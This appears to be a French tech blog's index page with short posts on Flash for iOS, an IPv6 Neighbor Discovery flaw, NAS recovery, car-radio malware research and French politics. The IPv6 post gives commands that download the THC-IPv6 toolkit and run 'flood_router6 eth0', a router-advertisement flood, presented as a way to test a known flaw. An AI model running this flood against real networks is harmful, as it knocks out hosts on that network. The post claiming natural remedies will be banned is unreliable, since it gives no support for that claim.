Adobe annonce Flash sous iOS

tux-news.pngAdobe a dévoilé au IBC 2011 à Amsterdam Flash Media Server 4.5. L'une des nouveautés de cette solution est qu'elle permet de diffuser du contenu vers  les équipements compatibles flash et ceux qui ne le sont pas tels que les iPhones ou les iPads. De cette manière les possésseurs d'iOS pourront lire des vidéos flash sans avoir besoin d'installer le plugin et donc sans souffrir des inconvénients qui vont avec mais encore faut-il que le site qui héberge la vidéo ait installé le nouveau soft d'Adobe.
En résumé Adobe Flash Media Server 4.5 permet de diffuser une vidéo en Flash ou en HTML5... c'est bien, mais pourquoi pas seulement en HTML5 pour régler le problème ?

Mais puisque je vous dis que c'est moi le routeur !

tux-secu.pngPetit à petit nos équipements intègrent des piles IPv6. Comme ça le jour où nous nous déciderons à y passer...
Récemment, je suis tombé sur un article de Tux-planet qui traitait d'une faille dans les implémentations du Neighbor Discovery Protocol (NDP) des piles IPv6 de differents systèmes d'exploitation. Serait touchés, entre-autres, Windows 7, Vista et les XP qui contiennent une pile IPv6 (ce qui n'est pas le cas par défaut).
L'article explique comment tester cette faille avec un outil d'attaque IPv6. Je reprends ici l'exemple pour télécharger, compiler et utiliser cet outil sous ubuntu :

 

sudo apt-get install libpcap0.8-dev libssl-dev
wget http://freeworld.thc.org/releases/thc-ipv6-1.4.tar.gz
tar zxvf thc-ipv6-*.tar.gz && rm -f thc-ipv6-*.tar.gz
cd thc-ipv6-*
make
sudo ./flood_router6 eth0

Lire la suite : Mais puisque je vous dis que c'est moi le routeur !

La galère du NAS

 tux-ubuntu.pngIl y a plusieurs mois nous avions fait l'aquisition d'un NAS. Un Iomega StorCenter ix2. Il était fourni avec deux disques sata de 1Tb. Cette bestiole embarque un OS GNU/Linux qui lui permet de partager les fichiers via les protocoles standards cifs, nfs, afp, etc.nas_iomega.jpg Il propose aussi deux choix de gestion des disques; RAID 1 ou JBOD. Lors de l'installation l'assistant demande de choisir l'un de ces modes et sur le moment la tentation de profiter pleinement de mes 2Tb a été plus forte que la sage sécurité du miroir. Nous avons donc commencé à entreposer nos données sur le NAS et plusieurs mois après le constat fut sans appel; nous avions stocké des données importantes que ne nous voulions pas voir disparaitre. C'est que le JBOD du NAS est géré par un groupe de volumes LVM qui contient les deux disques comme volumes physiques. Ce qui signifie que si l'un des deux disques mourrait, nous perdions (au mieux) les données sur le disque défectueux ... pas glop !

La décision fut donc prise de remédier à ce problème. Comme nous avions un peu plus d'1Tb de données, nous avons acheté deux disques de 2Tb chacun et un nouveau NAS. Une fois le petit dernier proprement installé et configuré en RAID 1, j'y ai copié les données du premier NAS. Il ne restait plus alors qu'à supprimer les définitions de partages sur le premier NAS et le configurer à son tour pour utiliser les disques en RAID 1. Sauf que voila, un des partages correspondait à un disque dur externe USB qui n'était plus présent et là impossible de supprimer ce fichu partage et sans ça impossible d'effacer ou de reconfigurer la gestion des disques via l'interface web.
"Qu'à cela ne tienne !" me suis-je dit. J'ai démonté les disques et j'ai supprimé les partitions sur chacun d'eux. Ahem... grossière erreur ! Car voila les fichiers systèmes n'étaient pas simplement stockés dans une mémoire flash ou autre mais sur une partition sur les disques. Et là c'est le drame le NAS ne rédémarre plus, à la place j'ai le phénomène, bien connu sur le web, de la led bleue qui clignote à l'infini. J'ai cherché une solution pendant deux semaines sans succés puis j'ai laissé tombé 2 mois avant de reprendre aujourd'hui et de parvenir à le remettre en route. Voici donc comment faire, pour récupérer un NAS Iomega StorCenter ix2 si jamais vous lui insérez des disques vierges (quelques soit vos raisons :p ).

 

Lire la suite : La galère du NAS

La fin annoncée des remèdes naturels ?

tux-news.pngL'union Européenne devrait le 30 avril 2011 via la transposition de la THMPD (Traditional Herbal Medicinal Products Directive) en France va faire interdire les remèdes naturels. Est-ce le début de la fin du libre choix du malade sur sa médication ?

Plus d'information sur :

De la faille dans les autoradios

tux-secu.pngVous le savez tous, on vous le dis et on vous le répète télécharger illégalement des musiques c'est le mal absolu (arf ;) ). Oui mais voila, Mme Michu, elle, elle s'en moque car ce qu'elle veut c'est graver ses musiques pour les écouter tranquillement dans sa voiture dernier cri.

Et bien Mme Michu, ne croyez plus être à l'abri dans votre nouvelle voiture qui sait lire des mp3 car des chercheurs des universités de Californie et Washinton sont parvenus à ajouter un bout de code malicieux dans un fichier de musique numérique. Une fois gravé et lu par l'autoradio, le cheval de Troie modifie le firmware de l'autoradio donnant ainsi accès à des fonctions plus critiques de la voiture.
"Il est difficile de penser à quelque chose de plus inoffensif qu'une chanson." indique Stefan Savage professeur à l'université de Californie.

Lors d'une expérience en 2009 (qui incluait aussi d'autres types d'attaques que la musique), Stefan Savage et ses collègues chercheurs, sont parvenus à couper le moteur, bloquer les portes, couper les freins et falsifier l'indicateur de vitesse d'une voiture dernier modèle.

De quoi vous faire regarder votre mp3 d'une autre manière.

sources : Slashdot et Itworld

Interdiction de boycotter

tux-justice.pngLibération vient de publier le 19/11/2010 dernier un article indiquant qu'il y a désormais une circulaire visant à interdire le boycott car le boycott est une mesure discréminatoire punis d'un an d'emprisonnement et de 45000€ d'amende

L'article en détail sur libération.fr

 

[Hadopi] RWW Vs SCPP

tux-politique.pngIl y a quelques jours j'ai trouvé sur le site de Korben la vidéo d'un débat enregistré lors de l'émission "Revu et corrigé" sur France 5. Ce débat opposait Fabrice Epelboin, directeur de Publication chez ReadWriteWeb France (RWW) à Marc Guez directeur général de la Société civile des producteurs phonographiques (SCPP).

Bien que tout a été dit au sujet d'Hadopi, on entend encore et toujours les mêmes arguments foireux : 
- "Quoi ? T'es contre la loi Hadopi ? Mais tu veux pas que les artistes vivent de leur art ?"

Alors non, nous ne sommes pas contre les artistes et la culture mais bien contre les dispositions prises dans cette loi. Et justement dans ce débat Fabrice Epelboin expose clairement les reproches que l'on peut faire à la loi et en profite pour rétablir certaines vérités.

 
France5 / Revu et corrigé / Hadopi
envoyé par hadopipi. - L'info internationale vidéo.